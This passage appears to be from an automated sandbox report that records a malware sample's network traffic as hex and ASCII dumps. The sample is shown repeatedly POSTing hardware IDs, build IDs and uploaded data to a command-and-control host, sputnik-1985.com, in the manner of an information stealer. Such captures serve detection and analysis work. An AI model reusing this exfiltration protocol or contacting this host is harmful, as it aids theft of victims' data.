                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1369INData Raw: 7a 72 62 32 62 46 71 52 51 35 72 34 34 71 43 35 7a 78 64 7a 79 56 65 4e 73 31 54 55 55 5a 49 2b 4b 2b 71 6f 37 59 6f 35 6c 49 70 71 6b 6e 4a 64 65 37 45 31 2f 42 38 6e 5a 59 79 71 45 33 4c 4b 51 39 31 6e 49 62 53 77 46 2b 37 4b 61 42 6a 73 69 6a 34 51 58 30 6f 32 46 2b 67 59 31 58 62 2f 48 62 5a 30 2b 43 69 43 42 6f 6a 7a 48 53 4e 33 55 4f 56 58 62 73 73 50 6a 49 77 4c 75 4f 42 66 53 2f 4d 47 61 5a 36 41 59 36 71 6f 38 6d 44 70 32 35 61 58 66 4b 49 49 49 74 43 55 73 42 59 2b 79 6d 2b 49 6d 44 38 63 78 4e 74 36 30 69 59 66 2b 47 56 33 66 79 30 33 70 66 38 5a 67 4a 59 34 73 31 7a 44 64 71 45 30 78 68 72 2f 75 2f 38 4c 37 74 32 56 2b 7a 74 53 63 6d 67 66 59 55 62 72 2b 45 53 42 36 48 35 68 67 67 79 69 36 43 4c 52 73 77 51 6e 2b 69 2b 61 37 66 7a 63 44 49 52
                                                                                                                                                                                                            Data Ascii: zrb2bFqRQ5r44qC5zxdzyVeNs1TUUZI+K+qo7Yo5lIpqknJde7E1/B8nZYyqE3LKQ91nIbSwF+7KaBjsij4QX0o2F+gY1Xb/HbZ0+CiCBojzHSN3UOVXbssPjIwLuOBfS/MGaZ6AY6qo8mDp25aXfKIIItCUsBY+ym+ImD8cxNt60iYf+GV3fy03pf8ZgJY4s1zDdqE0xhr/u/8L7t2V+ztScmgfYUbr+ESB6H5hggyi6CLRswQn+i+a7fzcDIR
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC1369INData Raw: 30 67 65 41 55 4a 76 7a 4f 59 31 6a 4d 73 43 51 70 74 41 6a 6c 65 31 77 45 56 32 47 68 38 70 6e 4e 6b 65 6e 67 64 61 47 34 4c 79 6a 47 72 6b 55 68 73 5a 78 2b 48 70 65 66 5a 79 62 4b 43 59 77 31 51 30 55 5a 4d 5a 6e 39 74 73 43 48 39 63 38 47 6b 37 55 6d 4a 39 65 6f 57 57 33 65 33 32 42 55 6a 2b 68 6e 61 4d 70 75 6b 44 73 62 41 56 41 78 39 4b 37 71 6c 64 57 77 69 52 76 6d 70 47 38 2f 67 61 34 55 4f 61 32 53 4d 55 79 50 2f 6d 63 70 69 53 54 51 63 31 67 54 51 6a 61 53 77 4a 33 5a 67 2f 50 59 53 49 71 46 43 69 72 48 76 30 35 6d 2b 66 70 52 48 6f 48 6d 4b 43 37 53 44 34 49 39 47 7a 6f 50 4d 62 53 2b 34 49 36 31 34 4e 42 46 73 36 30 77 61 2b 53 76 56 33 48 35 33 7a 45 51 6a 36 42 6e 4e 74 70 34 67 6e 46 4b 52 52 6b 68 2f 71 58 74 6e 64 65 7a 6a 46 54 36 6f 6d
                                                                                                                                                                                                            Data Ascii: 0geAUJvzOY1jMsCQptAjle1wEV2Gh8pnNkengdaG4LyjGrkUhsZx+HpefZybKCYw1Q0UZMZn9tsCH9c8Gk7UmJ9eoWW3e32BUj+hnaMpukDsbAVAx9K7qldWwiRvmpG8/ga4UOa2SMUyP/mcpiSTQc1gTQjaSwJ3Zg/PYSIqFCirHv05m+fpRHoHmKC7SD4I9GzoPMbS+4I614NBFs60wa+SvV3H53zEQj6BnNtp4gnFKRRkh/qXtndezjFT6om


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.349773104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:14 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=HDIY54FQBZE5
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 12833
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:14 UTC12833OUTData Raw: 2d 2d 48 44 49 59 35 34 46 51 42 5a 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 48 44 49 59 35 34 46 51 42 5a 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 44 49 59 35 34 46 51 42 5a 45 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 48 44 49 59 35 34 46
                                                                                                                                                                                                            Data Ascii: --HDIY54FQBZE5Content-Disposition: form-data; name="hwid"C144BB41BBB5F67BBC510B35BBB55F9A--HDIY54FQBZE5Content-Disposition: form-data; name="pid"2--HDIY54FQBZE5Content-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--HDIY54F
                                                                                                                                                                                                            2025-01-10 10:36:14 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:14 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=2qa90ir11gi4mlurqu3cmq324b; expires=Tue, 06 May 2025 04:22:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54hviorsNmkOq1cFv9v5tI2RtQ7K3j2tHEBWtCP7F%2Fe%2BVEnNTZk39bEJBFTiWUHi01%2FIF7gh8FQOGz6gxsCMIkqLI8GnYBWyO%2ByTIjsklHZMqpkWjHNlocCZa6L6J8rBgiv0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc065dbe4342e9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1754&rtt_var=662&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13767&delivery_rate=1645997&cwnd=240&unsent_bytes=0&cid=b8772e5600d1c33f&ts=421&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:36:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.349779104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:15 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=9PRQ9RE77OAYR9AA
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 12105
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:15 UTC12105OUTData Raw: 2d 2d 39 50 52 51 39 52 45 37 37 4f 41 59 52 39 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 39 50 52 51 39 52 45 37 37 4f 41 59 52 39 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 50 52 51 39 52 45 37 37 4f 41 59 52 39 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34
                                                                                                                                                                                                            Data Ascii: --9PRQ9RE77OAYR9AAContent-Disposition: form-data; name="hwid"C144BB41BBB5F67BBC510B35BBB55F9A--9PRQ9RE77OAYR9AAContent-Disposition: form-data; name="pid"2--9PRQ9RE77OAYR9AAContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
                                                                                                                                                                                                            2025-01-10 10:36:15 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:15 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=66080beu9nsrm7dm08kfbfevun; expires=Tue, 06 May 2025 04:22:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fe5LSkRJkz8RRb0VNBJPW8yXefnzTlQDqGZWyYMAh0S45iEX6wetc78rnqS3%2BPHikbR4jDnbWKvWkFZRs2JbDhWVGWICzlY%2F1u3CF%2BU7NEdpohu%2F1LLxE%2BflG750PGhd6bmG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc066419238c15-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1865&min_rtt=1830&rtt_var=712&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13043&delivery_rate=1595628&cwnd=238&unsent_bytes=0&cid=c0c9deff4ad2292e&ts=466&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:36:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.349788104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:16 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=QYFZCQ13SE3ZZXLYU
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 20457
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:16 UTC15331OUTData Raw: 2d 2d 51 59 46 5a 43 51 31 33 53 45 33 5a 5a 58 4c 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 51 59 46 5a 43 51 31 33 53 45 33 5a 5a 58 4c 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 59 46 5a 43 51 31 33 53 45 33 5a 5a 58 4c 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
                                                                                                                                                                                                            Data Ascii: --QYFZCQ13SE3ZZXLYUContent-Disposition: form-data; name="hwid"C144BB41BBB5F67BBC510B35BBB55F9A--QYFZCQ13SE3ZZXLYUContent-Disposition: form-data; name="pid"3--QYFZCQ13SE3ZZXLYUContent-Disposition: form-data; name="lid"HpOoIh--2a727a03
                                                                                                                                                                                                            2025-01-10 10:36:16 UTC5126OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8a 82 b9 75 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 dd 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 2b 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 75 47 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 ae 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 1d 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii: `u?sQ0u+4uG([:s~
                                                                                                                                                                                                            2025-01-10 10:36:17 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:17 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0sof70c44i4q8sninnkbt7bngm; expires=Tue, 06 May 2025 04:22:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8G1thiQPY1LPY2M3ImB7W69LLkU6IXv2ThRr7I8ZQSPaQwMYO%2BPweBueIR8S9H3lEySF3PHvrIrTQdfQEyRJMvszbsFVgwZjS4HAvoXS7nqUHAA3UQhTYUm27IG6pbCRzyj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc066b5e4043be-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1552&rtt_var=593&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21418&delivery_rate=1829573&cwnd=226&unsent_bytes=0&cid=cee58174dbcaf93f&ts=661&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:36:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.349799104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:17 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=U797ZPLIWVP6J6
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1213
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:17 UTC1213OUTData Raw: 2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 37 39 37 5a 50 4c 49 57 56 50 36 4a 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 55
                                                                                                                                                                                                            Data Ascii: --U797ZPLIWVP6J6Content-Disposition: form-data; name="hwid"C144BB41BBB5F67BBC510B35BBB55F9A--U797ZPLIWVP6J6Content-Disposition: form-data; name="pid"1--U797ZPLIWVP6J6Content-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--U
                                                                                                                                                                                                            2025-01-10 10:36:18 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:18 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o53juf4i1tff7lpt33nfql9dh6; expires=Tue, 06 May 2025 04:22:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrCGI8gi6OiGUcZNThX6wYr1QXIHXnUwPKKfz2s45SZ579H%2FNCExJ%2BpPp5db8CtNfq7DffJ0JIzbArUMCwosEh4XZ6Xm2NY7ccmaZOc7QXaAxqEe%2BRV%2B7leHADo9NDy8p0mC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc0673cced43be-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1582&rtt_var=593&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2126&delivery_rate=1845764&cwnd=226&unsent_bytes=0&cid=a80a9fd14569a4c9&ts=434&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:36:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.349805104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:18 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1NNI7LSH
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1052
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:18 UTC1052OUTData Raw: 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41 0d 0a 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 31 4e 4e 49 37 4c 53 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                            Data Ascii: --1NNI7LSHContent-Disposition: form-data; name="hwid"C144BB41BBB5F67BBC510B35BBB55F9A--1NNI7LSHContent-Disposition: form-data; name="pid"1--1NNI7LSHContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--1NNI7LSHContent-D
                                                                                                                                                                                                            2025-01-10 10:36:19 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:36:19 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=cneifbbud24f55b6ks5rjc7unn; expires=Tue, 06 May 2025 04:22:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=87P4WNPu6juIQszk5mcUj2c8EjaR0P3dFTIXC8Do4brbyYAV8ZkrgNF7rskkbD53ut9GRO8nBQsNHOzc165E8qjld292zuP9%2FyzuK71jy0Xaewmh2hG6DBqYf2m57l6i4we0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc067a5baac461-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1635&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1959&delivery_rate=1725768&cwnd=228&unsent_bytes=0&cid=c4cd94097a435301&ts=495&x=0"
                                                                                                                                                                                                            2025-01-10 10:36:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.349811104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:19 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 121
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:19 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 43 31 34 34 42 42 34 31 42 42 42 35 46 36 37 42 42 43 35 31 30 42 33 35 42 42 42 35 35 46 39 41
                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=C144BB41BBB5F67BBC510B35BBB55F9A
                                                                                                                                                                                                            2025-01-10 10:36:20 UTC1120INHTTP/1.1 200 OK
